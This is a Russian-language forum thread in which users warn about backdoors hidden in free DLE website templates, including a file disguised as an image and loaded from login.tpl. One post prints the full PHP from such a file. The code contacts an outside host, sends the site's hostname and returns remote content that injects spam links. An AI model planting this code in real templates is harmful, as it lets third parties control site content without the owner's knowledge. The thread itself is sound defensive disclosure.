• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.     Помогите модератору этого раздела killoff лично.

Информация Уязвимости в бесплатных шаблонах

Статус
В этой теме нельзя размещать новые ответы.
Inviseble_Demon

Inviseble_Demon

Мой дом здесь!
Регистрация
11 Дек 2008
Сообщения
478
Реакции
377
Сегодня ковырял фришный шаблон для DLE
Случайно наткнулся на...
\templates\******\images\btn_send.jpg (файл во вложении)
Файл скрытый...
Начал копаться...
login.tpl
1281048910-clip-4kb.png

Дальше base64_decode не пошол...
Суть и так ясна.
Задумка интересная у него была....
Советую проверить наличие данной гадости ;)
 

Вложения

  • btn_send.txt
    8,1 KB · Просмотры: 385
Да такое есть...
высылает и принимает данные из dlestats.if.ua и запись делает в engine/cache/system/topnews.tmp

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
 
Qwest-fx написал(а):
Так надо проверить что именно это.
Ведь может быть копирайт шаблона, а не
Надо проверять.
Нажмите для раскрытия...

недавно у себя на одном сайте обнаружил левые ссылки, 4 шт.
долго ковырял шаблон на предмет ссылок, не было их
но был скрипт с расширением графического файла который подгружался в login.tpl
вот с таким содержимым
PHP: 
<?php  
$sock = @fsockopen("www.erorhost.ru", 80, $errstr, $errno, 30); 
if ($sock){  
    $headers = "GET /sait/id2.php?site=".$_SERVER['HTTP_HOST']." HTTP/1.1\n"; 
    $headers .= "Host: www.erorhost.ru\n";  
    $headers .= "Accept: text/html, text/plain, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress  Accept-Language: ru,en Accept-Charset: windows-1251, iso-8859-1;q=0.01, us-ascii;q=0.01\n\n";  
     
    fwrite($sock, $headers); 
    $x10 = false; 
     
    while (!feof($sock)) { 
        $x11=fgets($sock,128); 
        if ($x10)  
            $result .= $x11; 
        else  
            $x13 .= $x11; 
             
        if ($x11 == "\r\n" )  
            $x10 = true; 
    } 
    fclose($sock); 
} 
else return $error; 
if (strstr($x13,'404')) return $error; 
else return $result;  
?>

у всех сайтов доноров был тИЦ от двухсот
вот такой вот маленький сапозаводик
 
А чё париться? удали кусок кода, посмотри всё работает да и всё)

По поводу фри - их нужно всегда пересматривать!
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху